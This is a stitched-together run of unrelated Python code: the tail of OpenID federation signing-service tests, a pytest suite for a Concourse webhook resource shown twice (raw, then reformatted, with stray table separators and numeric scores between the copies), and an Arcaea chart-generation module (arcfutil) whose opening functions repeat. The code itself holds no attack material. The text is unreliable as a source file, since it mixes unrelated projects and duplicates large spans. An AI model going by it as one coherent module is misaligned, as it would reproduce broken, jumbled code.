RegistrationRequest(redirect_uris=['https://example.com/rp/cb']),
receiver='https://example.com/rp'
)
_jws = factory(res)
assert _jws.jwt.headers['alg'] == 'RS256'
msg = _jws.jwt.payload()
assert msg['iss'] == 'https://swamid.sunet.se'
assert msg['aud'] == ['https://example.com/rp']
def test_web_signing_service():
_kj = KJ['https://swamid.sunet.se']
iss = InternalSigningService('https://swamid.sunet.se', _kj)
_sms = iss.create(
RegistrationRequest(redirect_uris=['https://example.com/rp/cb']),
'https://example.com/rp'
)
_jwks = _kj.export_jwks()
_vkj = KeyJar()
_vkj.import_jwks(_jwks, 'https://swamid.sunet.se')
wss = WebSigningServiceClient('https://swamid.sunet.se',
'https://swamid.sunet.se/mdss',
'https://example.com/rp', _vkj)
response = Response(200, _sms,
{'Location': 'https://swamid.sunet.se/mdss/abcdefg'})
_res = wss.parse_response(response)
assert set(_res.keys()) == {'sms', 'loc'}
def test_key_rotation():
# Build an internal signing service backed by the on-disk key pair for
# swamid.sunet.se.
config = {
'private_path': '{}/private/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
}
signing_service = make_internal_signing_service(config,
'https://swamid.sunet.se')
# Give the service a key spec to rotate in and a 1-second retirement
# window so old keys can age out within the test.
signing_service.keyconf = KEYDEFS
signing_service.remove_after = 1
signing_service.rotate_keys()
# KEYDEFS declares 2 keys; after one rotation the jar holds 4 — presumably
# the prior generation plus the freshly minted one (TODO confirm against
# rotate_keys semantics).
assert len(signing_service.keyjar.get_issuer_keys('')) == 4
# Sleep past remove_after so the oldest generation is eligible for removal
# on the next rotation, keeping the total stable at 4.
time.sleep(1)
signing_service.rotate_keys()
assert len(signing_service.keyjar.get_issuer_keys('')) == 4 | 0.448909 | 0.322766 |
import pytest
import random
import json
import os
from assets import resource
def test_send_no_thread():
test_message = str(random.getrandbits(128))
code, message = resource.send("https://httpbin.org/post", test_message, False)
assert code == 200
assert test_message in message
def test_send_thread():
test_message = str(random.getrandbits(128))
code, message = resource.send("https://httpbin.org/post", test_message, True)
assert code == 200
assert test_message in message
def test_get_bool_true():
assert resource.get_bool(True, True)
def test_get_bool_false():
assert not resource.get_bool(False, True)
def test_get_bool_default():
assert resource.get_bool("notaboolean", True)
def test_get_bool_failure():
try:
resource.get_bool(True, "notaboolean")
except Exception as ex:
print(ex)
return
assert False
def test_run_resource_check(basic_input):
data = json.dumps(basic_input)
assert resource.run_resource("check", data, "") == ([], True)
def test_run_resource_in(basic_input):
data = json.dumps(basic_input)
assert resource.run_resource("in", data, "") == ({"version": {}}, True)
def test_run_resource_out_basic(basic_input, basic_output, env_vars):
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_thread(basic_input, basic_output, env_vars):
basic_input["params"]["create_thread"] = True
basic_output["metadata"][4]["value"] = "True"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_thread(basic_input, basic_output, env_vars):
basic_input["params"]["create_thread"] = False
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_message(basic_input, basic_output, env_vars):
del basic_input["params"]["message"]
basic_output["metadata"][1]["value"] = "None"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_message_file(basic_input, basic_output, request, env_vars):
basic_input["params"]["message_file"] = "message.txt"
basic_output["metadata"][2]["value"] = "message.txt"
data = json.dumps(basic_input)
current_dir = request.fspath.dirname
assert resource.run_resource("out", data, [current_dir]) == (basic_output, True)
def test_run_resource_out_missing_message_file(basic_input, basic_output, env_vars):
basic_input["params"]["message_file"] = "not_a_message.txt"
basic_output["metadata"][2]["value"] = "not_a_message.txt"
data = json.dumps(basic_input)
current_dir = os.getcwd()
assert resource.run_resource("out", data, [current_dir]) == (basic_output, True)
def test_run_resource_out_add_info(basic_input, basic_output, env_vars):
basic_input["params"]["post_info"] = True
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_info(basic_input, basic_output, env_vars):
basic_input["params"]["post_info"] = False
basic_output["metadata"][8]["value"] = "False"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_add_url(basic_input, basic_output, env_vars):
basic_input["params"]["post_url"] = True
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_url(basic_input, basic_output, env_vars):
basic_input["params"]["post_url"] = False
basic_output["metadata"][3]["value"] = ""
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_webhook_with_params(basic_input, basic_output, env_vars):
basic_input["source"]["webhook_url"] = "https://httpbin.org/post?test=test"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_bad_webhook(basic_input, failure_output):
basic_input["source"]["webhook_url"] = "https://httpbin.org/get"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (failure_output, False)
def test_run_resource_out_missing_webhook(basic_input, failure_output):
del basic_input["source"]["webhook_url"]
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (failure_output, False)
@pytest.fixture
def env_vars():
os.environ["BUILD_PIPELINE_NAME"] = "Test_Pipeline"
os.environ["BUILD_JOB_NAME"] = "Test_Job"
os.environ["BUILD_NAME"] = "1234"
os.environ["BUILD_TEAM_NAME"] = "Test_Team"
os.environ["ATC_EXTERNAL_URL"] = "https://not.a.site"
yield True
del os.environ["BUILD_PIPELINE_NAME"]
del os.environ["BUILD_JOB_NAME"]
del os.environ["BUILD_NAME"]
del os.environ["BUILD_TEAM_NAME"]
del os.environ["ATC_EXTERNAL_URL"]
@pytest.fixture
def basic_input():
return {
"source": {"webhook_url": "https://httpbin.org/post"},
"params": {"message": "Test Message"},
}
@pytest.fixture
def basic_output():
url = "https://not.a.site/teams/Test_Team/pipelines/Test_Pipeline/jobs/Test_Job/builds/1234"
return {
"version": {},
"metadata": [
{"name": "Status", "value": "Posted"},
{"name": "Message", "value": "Test Message"},
{"name": "Message File Name", "value": "None"},
{"name": "Build URL", "value": url},
{"name": "Thread Created", "value": "False"},
{"name": "Pipeline Name", "value": "Test_Pipeline"},
{"name": "Job Name", "value": "Test_Job"},
{"name": "Build Number", "value": "1234"},
{"name": "Info Sent", "value": "True"},
{"name": "Sender Name", "value": None},
{"name": "Sender Display Name", "value": None},
{"name": "Space Name", "value": None},
{"name": "Space Display Name", "value": None},
{"name": "Space Type", "value": None},
{"name": "Thread Name", "value": None},
{"name": "Time Created", "value": None},
],
}
@pytest.fixture
def failure_output():
return {"version": {}, "metadata": [{"name": "status", "value": "Failed"}]} | test_resource.py | import pytest
import random
import json
import os
from assets import resource
def test_send_no_thread():
test_message = str(random.getrandbits(128))
code, message = resource.send("https://httpbin.org/post", test_message, False)
assert code == 200
assert test_message in message
def test_send_thread():
test_message = str(random.getrandbits(128))
code, message = resource.send("https://httpbin.org/post", test_message, True)
assert code == 200
assert test_message in message
def test_get_bool_true():
assert resource.get_bool(True, True)
def test_get_bool_false():
assert not resource.get_bool(False, True)
def test_get_bool_default():
assert resource.get_bool("notaboolean", True)
def test_get_bool_failure():
try:
resource.get_bool(True, "notaboolean")
except Exception as ex:
print(ex)
return
assert False
def test_run_resource_check(basic_input):
data = json.dumps(basic_input)
assert resource.run_resource("check", data, "") == ([], True)
def test_run_resource_in(basic_input):
data = json.dumps(basic_input)
assert resource.run_resource("in", data, "") == ({"version": {}}, True)
def test_run_resource_out_basic(basic_input, basic_output, env_vars):
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_thread(basic_input, basic_output, env_vars):
basic_input["params"]["create_thread"] = True
basic_output["metadata"][4]["value"] = "True"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_thread(basic_input, basic_output, env_vars):
basic_input["params"]["create_thread"] = False
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_message(basic_input, basic_output, env_vars):
del basic_input["params"]["message"]
basic_output["metadata"][1]["value"] = "None"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_message_file(basic_input, basic_output, request, env_vars):
basic_input["params"]["message_file"] = "message.txt"
basic_output["metadata"][2]["value"] = "message.txt"
data = json.dumps(basic_input)
current_dir = request.fspath.dirname
assert resource.run_resource("out", data, [current_dir]) == (basic_output, True)
def test_run_resource_out_missing_message_file(basic_input, basic_output, env_vars):
basic_input["params"]["message_file"] = "not_a_message.txt"
basic_output["metadata"][2]["value"] = "not_a_message.txt"
data = json.dumps(basic_input)
current_dir = os.getcwd()
assert resource.run_resource("out", data, [current_dir]) == (basic_output, True)
def test_run_resource_out_add_info(basic_input, basic_output, env_vars):
basic_input["params"]["post_info"] = True
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_info(basic_input, basic_output, env_vars):
basic_input["params"]["post_info"] = False
basic_output["metadata"][8]["value"] = "False"
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_add_url(basic_input, basic_output, env_vars):
basic_input["params"]["post_url"] = True
data = json.dumps(basic_input)
assert resource.run_resource("out", data, "") == (basic_output, True)
def test_run_resource_out_no_url(basic_input, basic_output, env_vars):
    # Disabling post_url blanks the "Build URL" metadata entry.
    basic_input["params"]["post_url"] = False
    basic_output["metadata"][3]["value"] = ""
    assert resource.run_resource("out", json.dumps(basic_input), "") == (basic_output, True)
def test_run_resource_out_webhook_with_params(basic_input, basic_output, env_vars):
    # A webhook URL carrying its own query string must still work.
    basic_input["source"]["webhook_url"] = "https://httpbin.org/post?test=test"
    assert resource.run_resource("out", json.dumps(basic_input), "") == (basic_output, True)
def test_run_resource_out_bad_webhook(basic_input, failure_output):
    # An endpoint that rejects POST yields the failure payload and False.
    basic_input["source"]["webhook_url"] = "https://httpbin.org/get"
    assert resource.run_resource("out", json.dumps(basic_input), "") == (failure_output, False)
def test_run_resource_out_missing_webhook(basic_input, failure_output):
    # Omitting the webhook_url source field must fail gracefully.
    del basic_input["source"]["webhook_url"]
    assert resource.run_resource("out", json.dumps(basic_input), "") == (failure_output, False)
@pytest.fixture
def env_vars():
    """Provide the Concourse build environment variables for one test, then clean up."""
    values = {
        "BUILD_PIPELINE_NAME": "Test_Pipeline",
        "BUILD_JOB_NAME": "Test_Job",
        "BUILD_NAME": "1234",
        "BUILD_TEAM_NAME": "Test_Team",
        "ATC_EXTERNAL_URL": "https://not.a.site",
    }
    os.environ.update(values)
    yield True
    for key in values:
        del os.environ[key]
@pytest.fixture
def basic_input():
    """Minimal valid resource payload: a webhook source plus a message param."""
    source = {"webhook_url": "https://httpbin.org/post"}
    params = {"message": "Test Message"}
    return {"source": source, "params": params}
@pytest.fixture
def basic_output():
    """Expected payload of a successful put: empty version + full metadata table."""
    url = "https://not.a.site/teams/Test_Team/pipelines/Test_Pipeline/jobs/Test_Job/builds/1234"
    pairs = [
        ("Status", "Posted"),
        ("Message", "Test Message"),
        ("Message File Name", "None"),
        ("Build URL", url),
        ("Thread Created", "False"),
        ("Pipeline Name", "Test_Pipeline"),
        ("Job Name", "Test_Job"),
        ("Build Number", "1234"),
        ("Info Sent", "True"),
        ("Sender Name", None),
        ("Sender Display Name", None),
        ("Space Name", None),
        ("Space Display Name", None),
        ("Space Type", None),
        ("Thread Name", None),
        ("Time Created", None),
    ]
    return {"version": {}, "metadata": [{"name": n, "value": v} for n, v in pairs]}
@pytest.fixture
def failure_output():
    """Expected payload of a failed put: empty version and a single status entry."""
    metadata = [{"name": "status", "value": "Failed"}]
    return {"version": {}, "metadata": metadata}
# (c)2021 .direwolf <<EMAIL>>
# Licensed under the MIT License.
from typing import Callable, Iterable, List, Literal
from arcfutil.aff.note.notegroup import TimingGroup
from ..note import Arc
from ..note import NoteGroup
from ..note import SceneControl
from ..note import Timing
from random import randint
from ...exception import AffNoteTypeError, AffNoteValueError
from ..easing import get_ease, linear
from copy import deepcopy
def arc_crease_line(
    base: Arc,
    x_range: float,
    y_range: float,
    count: int,
    mode='m',
    easing='s'
) -> NoteGroup:
    """Split `base` into `count` pieces and offset them into a zig-zag "crease".

    :param base: arc to split; `base[::each_len]` is assumed to slice it into
        equal-duration sub-arcs — TODO confirm Arc.__getitem__ slice semantics.
    :param x_range: horizontal offset, applied with alternating sign per piece.
    :param y_range: vertical offset, applied with alternating sign per piece.
    :param count: number of pieces to produce.
    :param mode: 'm' for regarding base arc as median,
        'b' for regarding base arc as border.
    :param easing: easing assigned to the offset pieces.
    :raises ValueError: on an unknown mode.
    :return: NoteGroup containing the offset pieces.
    """
    each_len = (base.totime - base.time) / count
    arclist = NoteGroup(base[::each_len])
    currentx = base.fromx
    currenty = base.fromy
    if mode == 'm':
        # Median mode: chain each piece onto the previous end point and swing
        # the far end by (+/-x_range, +/-y_range), flipping sign every piece.
        for each in arclist:
            each.fromx = currentx
            each.fromy = currenty
            each.tox += x_range
            each.toy += y_range
            each.slideeasing = easing
            x_range = -x_range
            y_range = -y_range
            currentx = each.tox
            currenty = each.toy
    elif mode == 'b':
        # Border mode: offset only the shared joints of every second pair so
        # the original arc path stays as one border of the crease.
        for i in range(1, len(arclist), 2):
            arclist[i].fromx += x_range
            arclist[i - 1].tox += x_range
            arclist[i].fromy += y_range
            arclist[i - 1].toy += y_range
            arclist[i].slideeasing = easing
            arclist[i - 1].slideeasing = easing
    else:
        raise ValueError('Invalid mode:' + mode)
    return arclist
def arc_rain(original_t: int, dest_t: int, step: float, length: float = None):
    """Generate a shower of short random skyline arcs between two timestamps.

    Every `step` ms a vertical-slice arc is spawned at a random (x, y); the x
    range is constrained by y so notes stay inside the playable trapezoid.
    """
    def max_x(y: int) -> int:
        return int(-0.5 * y + 200)

    def min_x(y: int) -> int:
        return int(0.5 * y)

    drops = NoteGroup()
    arc_len = step if length is None else length
    t = original_t
    while t <= dest_t:
        y_raw = randint(0, 100)
        x_raw = randint(min_x(y_raw), max_x(y_raw))
        # Truncate the final drop so it never extends past dest_t.
        end_t = dest_t if dest_t - t <= arc_len else int(t + arc_len)
        x_pos = (x_raw - 50) / 100
        y_pos = y_raw / 100
        drops.append(Arc(t, end_t, x_pos, x_pos, 's', y_pos, y_pos, 0, True))
        t += step
    return drops
def arc_slice_by_count(arc: Arc, count: int, start: int = None, stop: int = None):
    """Cut `arc` into `count` straight ('s') segments between `start` and `stop`.

    Positions are sampled from the source arc via `arc[t]` so the segments
    approximate its easing curve.

    :param arc: arc to slice.
    :param count: number of segments to produce.
    :param start: first timestamp of the sliced range (defaults to `arc.time`).
    :param stop: last timestamp of the sliced range (defaults to `arc.totime`).
    :raises AffNoteValueError: if `stop` is earlier than `start`.
    """
    start = start if start is not None else arc.time
    stop = stop if stop is not None else arc.totime
    if stop < start:
        raise AffNoteValueError(
            'stop time before start time'
        )
    step = (stop - start) / count
    if step < 1:
        # Clamp to one segment per millisecond of the requested window.
        # Bug fix: this previously reset `count` to the WHOLE arc's duration
        # (arc.totime - arc.time) even when an explicit, narrower start/stop
        # window was given, producing segments past `stop`.
        step = 1
        count = int(stop - start)
    destgroup = NoteGroup()
    for i in range(count):
        destgroup.append(Arc(
            start + i * step,
            start + (i + 1) * step,
            arc[start + i * step][0],
            arc[start + (i + 1) * step][0],
            's',
            arc[start + i * step][1],
            arc[start + (i + 1) * step][1],
            arc.color,
            arc.isskyline,
            fx=arc.fx
        ))
    return destgroup
def arc_slice_by_timing(arc: Arc, timings: Iterable):
    """Cut `arc` into straight segments at every Timing event it spans.

    Non-Timing entries and timings outside [arc.time, arc.totime] are ignored.
    Sky notes attached to a skyline arc are redistributed onto the segment
    whose time range contains them.
    """
    # Always cut at the arc's own endpoints; the set dedupes coincident timings.
    timepoints = {arc.time, arc.totime}
    for each in timings:
        if isinstance(each, Timing) and arc.time <= each.time <= arc.totime:
            timepoints.add(each.time)
    timepoints = sorted(timepoints)
    destgroup = NoteGroup()
    for i in range(len(timepoints) - 1):
        from_time = timepoints[i]
        to_time = timepoints[i + 1]
        # arc[t] samples the arc's (x, y) position at time t.
        from_slice = arc[from_time]
        to_slice = arc[to_time]
        temp_arc = Arc(
            from_time,
            to_time,
            from_slice[0],
            to_slice[0],
            's',
            from_slice[1],
            to_slice[1],
            arc.color,
            arc.isskyline
        )
        if arc.isskyline and arc.skynote:
            valid_skynotes = []
            for each in arc.skynote:
                if from_time <= each < to_time:
                    valid_skynotes.append(each)
                elif each == to_time and i == (len(timepoints) - 2):  # sky note at the very end of the skyline arc
                    valid_skynotes.append(each)
            temp_arc.skynote = valid_skynotes
        destgroup.append(temp_arc)
    return destgroup
def arc_animation_assist(
    arc: Arc,
    start_t: int,
    stop_t: int,
    delta_x: float,
    delta_y: float,
    basebpm: float,
    easing_x: Callable = linear,
    easing_y: Callable = linear,
    infbpm: float = 999999,
    framerate: float = 60,
    fake_note_t: int = 100000,
    offset_t: int = 0,
    delta_offset_t=0,
    easing_offset_t: Callable = linear
) -> NoteGroup:
    """Fake frame-by-frame animation of `arc` between `start_t` and `stop_t`.

    For each frame a `noinput` TimingGroup is emitted that flashes a displaced
    copy of the arc via extreme-BPM tricks: BPM jumps to `infbpm`, holds, then
    reverses, so the fake note (parked at `fake_note_t`) appears for exactly
    one frame.  Per frame the copy is moved by (delta_x, delta_y) scaled by
    the easing functions.
    """
    delta_t = 1000 / framerate
    # Guard against a window shorter than one frame: `count` divides below and
    # the old code raised ZeroDivisionError; produce a single frame instead.
    count = max(int((stop_t - start_t) / delta_t), 1)
    destgroup = NoteGroup()
    for i in range(count + 1):
        frame = TimingGroup(Timing(0, basebpm), opt='noinput')
        frame.append(SceneControl(0, 'hidegroup', y=1))
        # Start of this frame.
        t1 = start_t + i * delta_t
        frame.append(SceneControl(t1, 'hidegroup', y=0))
        frame.append(Timing(t1, infbpm))
        frame.append(Timing(t1 + 1, 0))
        # End of this frame: keep it visible for 1.5 frame-times to avoid flicker.
        frame.append(Timing(t1 + 1.5 * delta_t - 1, -infbpm))
        frame.append(Timing(t1 + 1.5 * delta_t, 0))
        frame.append(SceneControl(t1 + 2 * delta_t, 'hidegroup', y=1))  # hide slightly after the rewind
        # The fake note that is actually rendered.
        actual_offset_t = fake_note_t - (
            offset_t - delta_offset_t * easing_offset_t(i / count))
        frame.append(Timing(actual_offset_t, infbpm))
        frame.append(Timing(actual_offset_t + 1, basebpm))
        temp_arc = deepcopy(arc)
        temp_arc = temp_arc.offsetto(fake_note_t + 1)
        temp_arc.fromx += delta_x * easing_x(i / count)
        temp_arc.tox += delta_x * easing_x(i / count)
        temp_arc.fromy += delta_y * easing_y(i / count)
        temp_arc.toy += delta_y * easing_y(i / count)
        frame.append(temp_arc)
        destgroup.append(frame)
    return destgroup
def arc_envelope(a1: Arc, a2: Arc, count: int, mode: Literal['c', 'p'] = 'c') -> NoteGroup:
    """Weave two arcs into an "envelope" of `count` straight segments.

    :param a1: first boundary arc; its easing/color/skyline flag are reused.
    :param a2: second boundary arc.
    :param count: number of segments to generate.
    :param mode: 'c' zig-zags between the two arcs (crossing); 'p' connects
        corresponding slices of the two arcs in parallel.
    :raises AffNoteValueError: on an unknown mode.
    """
    class Point:
        # Lightweight (time, x, y) sample of an arc.
        def __init__(self, time, position) -> None:
            self.time: int = time
            self.x: float = position[0]
            self.y: float = position[1]
    arcs: List[Arc] = [a1, a2]
    easing, color, isskyline = a1.slideeasing, a1.color, a1.isskyline
    if mode == 'c':
        # Sample alternating arcs so consecutive points jump between them.
        points: List[Point] = []
        for i in range(count + 1):
            arc = arcs[i % 2]
            step = (arc.totime - arc.time) / count
            current_time = arc.time + step * i
            points.append(Point(current_time, arc[current_time]))
        zipped = [(points[i], points[i + 1]) for i in range(len(points) - 1)]
        return NoteGroup(map(lambda p: Arc(
            p[0].time, p[1].time, p[0].x, p[1].x, easing, p[0].y, p[1].y, color, isskyline
        ), zipped))
    elif mode == 'p':
        zipped = zip(
            arc_slice_by_count(arcs[0], count), arc_slice_by_count(arcs[1], count)
        )
        return NoteGroup(map(lambda p: Arc(
            p[0].time, p[0].totime, p[0].fromx, p[1].tox, easing, p[0].fromy, p[1].toy, color, isskyline
        ), zipped))
    else:
        # Bug fix: error message previously read "Excepting".
        raise AffNoteValueError(f"Expecting 'c' or 'p' for 'mode', not {mode}")
def arc_straighten(arcs: NoteGroup, x: bool = False, y: bool = False, connector: bool = False) -> NoteGroup:
    """Force arcs' end coordinates back to their start coordinates.

    NOTE: mutates the Arc objects in `arcs` in place; the returned group holds
    those same objects (plus optional zero-length connectors).

    :param x: force tox = fromx on every arc.
    :param y: force toy = fromy on every arc.
    :param connector: insert a zero-length 's' arc between consecutive arcs
        whose endpoints no longer line up after straightening.
    :raises AffNoteTypeError: if an element of `arcs` is not an Arc.
    """
    result = NoteGroup([])
    if not (x or y or connector):
        print('Warning: No option used, will return origin NoteGroup')
        return arcs
    for i in range(len(arcs)):
        arc = arcs[i]
        if not isinstance(arc, Arc):
            # Bug fix: error message previously read "Excepting".
            raise AffNoteTypeError(f"Expecting 'Arc', not {type(arc).__name__}")
        if x:
            arc.tox = arc.fromx
        if y:
            arc.toy = arc.fromy
        result.append(arc)
        if connector and (i != len(arcs) - 1):
            next_arc = arcs[i + 1]
            if isinstance(next_arc, Arc) and (next_arc.fromx != arc.tox or next_arc.fromy != arc.toy):
                result.append(Arc(arc.totime, arc.totime, arc.tox, next_arc.fromx, 's', arc.toy, next_arc.fromy, arc.color, arc.isskyline))
    return result
def arc_interlace(arcs: NoteGroup):
    """Toggle the skyline flag of every second arc, in place.

    Processes arcs pairwise (0,1), (2,3), ... and flips `isskyline` on the
    second arc of each pair; a trailing unpaired arc is left untouched.

    :raises AffNoteTypeError: if either arc of a pair is not an Arc.
    :return: the same NoteGroup, mutated.
    """
    # Bug fixes: removed a dead, never-returned `result` group, and the error
    # now names the element that actually failed the type check (the old code
    # always blamed arcs[i], even when arcs[i + 1] was the offender).
    for i in range(0, len(arcs) - 1, 2):
        if isinstance(arcs[i], Arc) and isinstance(arcs[i + 1], Arc):
            arcs[i + 1].isskyline = not arcs[i + 1].isskyline
        else:
            offender = arcs[i] if not isinstance(arcs[i], Arc) else arcs[i + 1]
            raise AffNoteTypeError(f"Expecting 'Arc', not {type(offender).__name__}")
    return arcs
# (c)2021 .direwolf <<EMAIL>>
# Licensed under the MIT License.
from typing import Callable, Iterable, List, Literal
from arcfutil.aff.note.notegroup import TimingGroup
from ..note import Arc
from ..note import NoteGroup
from ..note import SceneControl
from ..note import Timing
from random import randint
from ...exception import AffNoteTypeError, AffNoteValueError
from ..easing import get_ease, linear
from copy import deepcopy
def arc_crease_line(
    base: Arc,
    x_range: float,
    y_range: float,
    count: int,
    mode='m',
    easing='s'
) -> NoteGroup:
    """Split `base` into `count` pieces and offset them into a zig-zag "crease".

    :param base: arc to split; `base[::each_len]` is assumed to slice it into
        equal-duration sub-arcs — TODO confirm Arc.__getitem__ slice semantics.
    :param x_range: horizontal offset, applied with alternating sign per piece.
    :param y_range: vertical offset, applied with alternating sign per piece.
    :param count: number of pieces to produce.
    :param mode: 'm' for regarding base arc as median,
        'b' for regarding base arc as border.
    :param easing: easing assigned to the offset pieces.
    :raises ValueError: on an unknown mode.
    :return: NoteGroup containing the offset pieces.
    """
    each_len = (base.totime - base.time) / count
    arclist = NoteGroup(base[::each_len])
    currentx = base.fromx
    currenty = base.fromy
    if mode == 'm':
        # Median mode: chain each piece onto the previous end point and swing
        # the far end by (+/-x_range, +/-y_range), flipping sign every piece.
        for each in arclist:
            each.fromx = currentx
            each.fromy = currenty
            each.tox += x_range
            each.toy += y_range
            each.slideeasing = easing
            x_range = -x_range
            y_range = -y_range
            currentx = each.tox
            currenty = each.toy
    elif mode == 'b':
        # Border mode: offset only the shared joints of every second pair so
        # the original arc path stays as one border of the crease.
        for i in range(1, len(arclist), 2):
            arclist[i].fromx += x_range
            arclist[i - 1].tox += x_range
            arclist[i].fromy += y_range
            arclist[i - 1].toy += y_range
            arclist[i].slideeasing = easing
            arclist[i - 1].slideeasing = easing
    else:
        raise ValueError('Invalid mode:' + mode)
    return arclist
def arc_rain(original_t: int, dest_t: int, step: float, length: float = None):
    """Generate a shower of short random skyline arcs between two timestamps.

    Every `step` ms a vertical-slice arc is spawned at a random (x, y); the x
    range is constrained by y so notes stay inside the playable trapezoid.
    """
    def max_x(y: int) -> int:
        return int(-0.5 * y + 200)

    def min_x(y: int) -> int:
        return int(0.5 * y)

    drops = NoteGroup()
    arc_len = step if length is None else length
    t = original_t
    while t <= dest_t:
        y_raw = randint(0, 100)
        x_raw = randint(min_x(y_raw), max_x(y_raw))
        # Truncate the final drop so it never extends past dest_t.
        end_t = dest_t if dest_t - t <= arc_len else int(t + arc_len)
        x_pos = (x_raw - 50) / 100
        y_pos = y_raw / 100
        drops.append(Arc(t, end_t, x_pos, x_pos, 's', y_pos, y_pos, 0, True))
        t += step
    return drops
def arc_slice_by_count(arc: Arc, count: int, start: int = None, stop: int = None):
    """Cut `arc` into `count` straight ('s') segments between `start` and `stop`.

    Positions are sampled from the source arc via `arc[t]` so the segments
    approximate its easing curve.

    :param arc: arc to slice.
    :param count: number of segments to produce.
    :param start: first timestamp of the sliced range (defaults to `arc.time`).
    :param stop: last timestamp of the sliced range (defaults to `arc.totime`).
    :raises AffNoteValueError: if `stop` is earlier than `start`.
    """
    start = start if start is not None else arc.time
    stop = stop if stop is not None else arc.totime
    if stop < start:
        raise AffNoteValueError(
            'stop time before start time'
        )
    step = (stop - start) / count
    if step < 1:
        # Clamp to one segment per millisecond of the requested window.
        # Bug fix: this previously reset `count` to the WHOLE arc's duration
        # (arc.totime - arc.time) even when an explicit, narrower start/stop
        # window was given, producing segments past `stop`.
        step = 1
        count = int(stop - start)
    destgroup = NoteGroup()
    for i in range(count):
        destgroup.append(Arc(
            start + i * step,
            start + (i + 1) * step,
            arc[start + i * step][0],
            arc[start + (i + 1) * step][0],
            's',
            arc[start + i * step][1],
            arc[start + (i + 1) * step][1],
            arc.color,
            arc.isskyline,
            fx=arc.fx
        ))
    return destgroup
def arc_slice_by_timing(arc: Arc, timings: Iterable):
    """Cut `arc` into straight segments at every Timing event it spans.

    Non-Timing entries and timings outside [arc.time, arc.totime] are ignored.
    Sky notes attached to a skyline arc are redistributed onto the segment
    whose time range contains them.
    """
    # Always cut at the arc's own endpoints; the set dedupes coincident timings.
    timepoints = {arc.time, arc.totime}
    for each in timings:
        if isinstance(each, Timing) and arc.time <= each.time <= arc.totime:
            timepoints.add(each.time)
    timepoints = sorted(timepoints)
    destgroup = NoteGroup()
    for i in range(len(timepoints) - 1):
        from_time = timepoints[i]
        to_time = timepoints[i + 1]
        # arc[t] samples the arc's (x, y) position at time t.
        from_slice = arc[from_time]
        to_slice = arc[to_time]
        temp_arc = Arc(
            from_time,
            to_time,
            from_slice[0],
            to_slice[0],
            's',
            from_slice[1],
            to_slice[1],
            arc.color,
            arc.isskyline
        )
        if arc.isskyline and arc.skynote:
            valid_skynotes = []
            for each in arc.skynote:
                if from_time <= each < to_time:
                    valid_skynotes.append(each)
                elif each == to_time and i == (len(timepoints) - 2):  # sky note at the very end of the skyline arc
                    valid_skynotes.append(each)
            temp_arc.skynote = valid_skynotes
        destgroup.append(temp_arc)
    return destgroup
def arc_animation_assist(
    arc: Arc,
    start_t: int,
    stop_t: int,
    delta_x: float,
    delta_y: float,
    basebpm: float,
    easing_x: Callable = linear,
    easing_y: Callable = linear,
    infbpm: float = 999999,
    framerate: float = 60,
    fake_note_t: int = 100000,
    offset_t: int = 0,
    delta_offset_t=0,
    easing_offset_t: Callable = linear
) -> NoteGroup:
    """Fake frame-by-frame animation of `arc` between `start_t` and `stop_t`.

    For each frame a `noinput` TimingGroup is emitted that flashes a displaced
    copy of the arc via extreme-BPM tricks: BPM jumps to `infbpm`, holds, then
    reverses, so the fake note (parked at `fake_note_t`) appears for exactly
    one frame.  Per frame the copy is moved by (delta_x, delta_y) scaled by
    the easing functions.
    """
    delta_t = 1000 / framerate
    # Guard against a window shorter than one frame: `count` divides below and
    # the old code raised ZeroDivisionError; produce a single frame instead.
    count = max(int((stop_t - start_t) / delta_t), 1)
    destgroup = NoteGroup()
    for i in range(count + 1):
        frame = TimingGroup(Timing(0, basebpm), opt='noinput')
        frame.append(SceneControl(0, 'hidegroup', y=1))
        # Start of this frame.
        t1 = start_t + i * delta_t
        frame.append(SceneControl(t1, 'hidegroup', y=0))
        frame.append(Timing(t1, infbpm))
        frame.append(Timing(t1 + 1, 0))
        # End of this frame: keep it visible for 1.5 frame-times to avoid flicker.
        frame.append(Timing(t1 + 1.5 * delta_t - 1, -infbpm))
        frame.append(Timing(t1 + 1.5 * delta_t, 0))
        frame.append(SceneControl(t1 + 2 * delta_t, 'hidegroup', y=1))  # hide slightly after the rewind
        # The fake note that is actually rendered.
        actual_offset_t = fake_note_t - (
            offset_t - delta_offset_t * easing_offset_t(i / count))
        frame.append(Timing(actual_offset_t, infbpm))
        frame.append(Timing(actual_offset_t + 1, basebpm))
        temp_arc = deepcopy(arc)
        temp_arc = temp_arc.offsetto(fake_note_t + 1)
        temp_arc.fromx += delta_x * easing_x(i / count)
        temp_arc.tox += delta_x * easing_x(i / count)
        temp_arc.fromy += delta_y * easing_y(i / count)
        temp_arc.toy += delta_y * easing_y(i / count)
        frame.append(temp_arc)
        destgroup.append(frame)
    return destgroup
